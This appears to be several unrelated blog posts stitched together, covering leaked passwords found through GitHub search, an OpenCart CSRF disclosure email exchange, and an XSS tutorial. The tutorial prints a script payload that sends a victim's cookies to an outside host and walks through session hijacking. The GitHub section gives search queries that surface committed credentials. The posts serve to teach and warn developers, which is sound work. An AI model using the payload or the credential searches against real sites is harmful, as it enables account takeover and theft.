I did a simple test using GitHub’s search using certain keywords eg:

• root password (http://github.com/search?type=Code&language=&q=root+password&repo=&langOverride=&x=0&y=0&start_value=1)
• db_password (http://github.com/search?type=Code&language=&q=db_password&repo=&langOverride=&x=0&y=0&start_value=1)
• db_pass (http://github.com/search?type=Code&language=&q=db_pass&repo=&langOverride=&x=0&y=0&start_value=1)
• server password (http://github.com/search?langOverride=&language=&q=server+password&repo=&start_value=1&type=Code&x=0&y=0)

It only takes you to go through about 10 pages of search results (“root password” has over 10,000 results) and you can see a few password’s that look like real. GitHub do have an article about remove sensitive data (http://help.github.com/removing-sensitive-data/) but also has a good statement line saying “Once the commit has been pushed you should consider the data to be compromised. Period.” which is very true but it seems there are alot of developers out there that our committing there passwords. I wonder how many hackers have prowled through GitHub looking for passwords and in result successfully been able to pull of an attack.

However, the best search term is “gmail password” (http://github.com/search?type=Code&language=&q=gmail+password&repo=&langOverride=&x=0&y=0&start_value=1) which as you can see, the first result looks like a real gmail password. I haven’t tested any of these passwords but I’m sure there is plenty of real passwords that developers have committed.

So remember, DON’T COMMIT YOUR PASSWORDS!

The winners are announced at the BlackHat USA 2010 conference in Las Vagas which is the event ontop of my to go to list……..now where is my free ticket?

You can grab it here: http://github.com/bmaynard/OpenCart-Secured

Update: I have now upgraded the repository to 1.4.2

Update 2: I have now upgraded the repository to 1.4.4

I have drafted an example of the exploit, sent it to the creator of OpenCart and gave an example of how a user could be targeted with the attacker changing the PayPal email address to their own account. I did this as I didn’t want to publish the exploit until a fix was implemented and a new version was released, but as the following email transcript will show, this is not going to happen anytime soon.

————————————————–
From: “Ben”
Sent: Friday, January 22, 2010 8:06 PM
To: < *******@opencart.com>
Subject: OpenCart – Enquiry

Hi,

I recently installed OpenCart and I noticed that it is vulnerable to CSRF attacks. I have created a sample page that is capable of inserting a rouge user (the page currently prompts you but could be done silently if the attacker knows the url of the site).

http://visionsource.org/*********.html

Please let know that you are looking into the security issue and are going to release an update with a fix otherwise I will make the issue public.

If you need any help fixing the problem please let me know.

Thanks,
Ben.
————————————————–
On 2010-01-22, at 4:50 PM, Daniel Kerr wrote:

Ben you seem to be very clever to come up with this. But! you need to be logged in for this to happen.

————————————————–
From: “Ben Maynard”
Sent: Friday, January 22, 2010 11:34 PM
To: “Daniel Kerr”
Subject: Re: OpenCart – Enquiry

HI Daniel,

That is the whole point of a CSRF attack. Please read http://en.wikipedia.org/wiki/Csrf for an explanation on the attack.

This can be very dangerous, for example:

I am an attacker looking at stealing money, I find a websites that are running opencart and have paypal as a payment method. I send the owner an email asking a question about a product and send a link that will perform the attack on the website. The chances of the owner being logged into their opencart admin is high since they are dealing with orders, and a rouge account is created without the user knowing (The attacker could just format the malicious page to look like a 404 not found page so it doesnt raise suspicion with the owner).

The attacker makes the script send an email when the page is hit, so he knows when to logged into the admin section. The attacker then logs in, changes the paypal email address to his own account, deletes the new account to help cover his tracks. He starts to get the money from the website and the owner of the website may not realize what has happened for a couple of days (maybe even longer)!

If someone was to do this, it would cause a major problem for the owner (and buyers who money was stolen).

I have implemented a fix on the website i am working on and dont mind sharing the fix. I create a random token when the user logs in, and in the Url class I add it to the url. There is also a check on the user auth.

Thanks,
Ben.
————————————————–
On 2010-01-22, at 7:31 PM, Daniel Kerr wrote:

This sort of thing is down to the client. The software on a clients computer is nothing to do with opencart! There is no way that I’m responsible for a client being stupid enough to click links in emails.

Even professional banking sites have trouble with the problem you describe.

The only thing a client can take steps to do is only allowing certain IP’s to access the admin via their hosting.

————————————————–
From: “Ben Maynard”
Sent: Saturday, January 23, 2010 12:52 AM
To: “Daniel Kerr”
Subject: Re: OpenCart – Enquiry

A link in an email is not the only way for this attack to be performed, it was just an example. Its not hard to add protection and would make open cart more secure, security is not something you can take lightly.

————————————————–
On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
what protection do you recommend?
————————————————–
On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
to be honest this again is down to the client. not opencart.

the security problem is very low. seriously how is some one going to trick some one into clicking a link to a site that will them display there own web site admin?

your just wasting my time.

Now as you can see, the creator doesn’t care about security which is a very dangerous thing especially when you are creating e-commerce websites. It is also not hard to find websites running OpenCart, you can just google “Powered By OpenCart” and you get thousands of results, imagine how much money could be stolen by targeting half of these websites and who says its not being done right now? This is why it makes me really angry when web developers don’t take security seriously. Now I love PHP and hate it when people say bad things about the language but its true when they say PHP is like a handgun.

PHP is like a handgun. On its own, it is simply an inanimate tool that has no moral leaning. In the hands of a responsible citizen, it can be used to the benefit of society. But in the hands of someone who is untrained or mentally unstable, it can be used to commit horrible atrocities.

Whenever there’s such a tragedy, other developers are quick to blame PHP. If PHP were illegal, then Yahoo! would never have happened. If we regulated PHP tightly, then there would be no Digg.

via The Register.

Now does anyone have any suggestions on what could be done to get the developer to acknowledge the problem and not just put his head in the sand?

Since more independent software makers are including this feature into their applications, it wouldn’t be a stretch of the mind to think that their website has some security holes which could allow an attacker to take control of the webserver with a shell script or something similar.

Now say an attacker has uploaded a php script that takes advantage of the shell and even uses a list of php functions to help his attack. If the software is hosted on the same server, the attacker could then find out how the software checks for updates and trick the application to think that there is a new version and point the download location to where his malware is hosted. Now the end user thinks there is a new version, downloads it and now he has a virus on his machine.

With more and more applications including this feature, it would be possible to find an application that is hosted on a shared hosting environment, and even if their website has no security faults an attacker could potentially perform the same attack but was able to get his/her shell script onto the server through another website hosted on the same machine.

Now it will be interesting to see over the next couple of years to see how common this becomes, and its definitely not a stretch of the imagination that this could happen to a large company as Kaspersky was recently hacked through an sql injection on their website.

So what they did was transfer the man’s number over to an unknown carrier, and then transfered the money and wollah they now have the SMS code since they took control of his phone. Unfortunally there wasn’t much information about the attack, but I would have to think they would of had alot of personal information already to succesfully pull of the hack. Still it is something to think about on possiable hacking methods.

http://ha.ckers.org/blog/20080305/username-based-primary-key-issues/

My first post will be about Cross-site Scripting (XSS) attacks, which I have had to deal with this week. XSS IS A HUGE AND DANGEROUS issue posed in any web application, which allows the attacker to inject code into your application. The most popular type of XSS attack is injecting HTML or javascript into the browser output. This is caused when the developer does not correctly sanitize their input, and prints it out to the browser. There are also more powerful XSS attacks which injects code into the actual application eg: when including a php file, you grab the file name straight from the browser, but I will not go into this because frankly if your application contains a security issue like this……..well you have chosen the wrong industry (ok, you’re learning, well I suppose your excused).

A common XSS exploit is to grab the contents of the cookies via javascript, and to email/log the results. Bellow is the vulnerable PHP code:

echo “Message: “ . $_GET[‘msg’];

As you can see, I print the input from the user straight to the browser. As an attacker, I could run this url: badfile.php?msg= <script>document.write(‘<img src=”http://visionsource.org/xssattack.php?cookie=’ + document.cookie + ‘”>’);</script>. Now that will email me the contents of the cookies of whoever visits that url. So what you’re saying? Who is ever going to go to that url? The answer is possibly you. Early this week I demonstrated this very hack which in returned allowed me access to the admin control panel of the website. How I did this was on the victim machine, I logged into the admin panel (for the specific attack, I wanted admin access) and then after I was finished in the admin area, I proceeded to the forum which an admin should be visiting since it is their site and all. I then set up a post in the forum, made a link to the made url, gave the link a creative name like “error with website, what’s wrong with it admin?” (creativity, I don’t have it).

The admin then clicked on the link, which emailed me their cookies and contained the user’s PHP Session id. I then went to my machine and changed my PHP Session id to be the value of the victims session, went to the admin panel and wollah I’m in. This is due to the victim was still logged into the admin area and I then stole their session. From here I could create some serious damage, change all the content to whatever I want, make all the pages redirect to a website of myn, anything!

This is a very basic XSS attack, but yet can still create some serious damage to the website in question. Some other forms to make the user visit the special crafted url is to put the link in an image, which automatically gets loaded some as the victim loads the page and it’s possible for the admin to not even notice the attack, giving you more time to hack the website (and more tries). Attacks like this don’t just limit to admins, but even members of the website so I can log into the profile and view pm’s, history of actions on the website etc.

To avoid these attacks, you can run the strip_tags() or htmlspecialchars() or htmlentities() function, but I suggest using a well known third party library to prevent XSS attacks. I recommend HTML Purifier which seems to be one of the best filters out in the market plus its open source.

The one thing you have to remember as a developer is never think it won’t happen to you, because it will, your business will look bad and you could even get fired!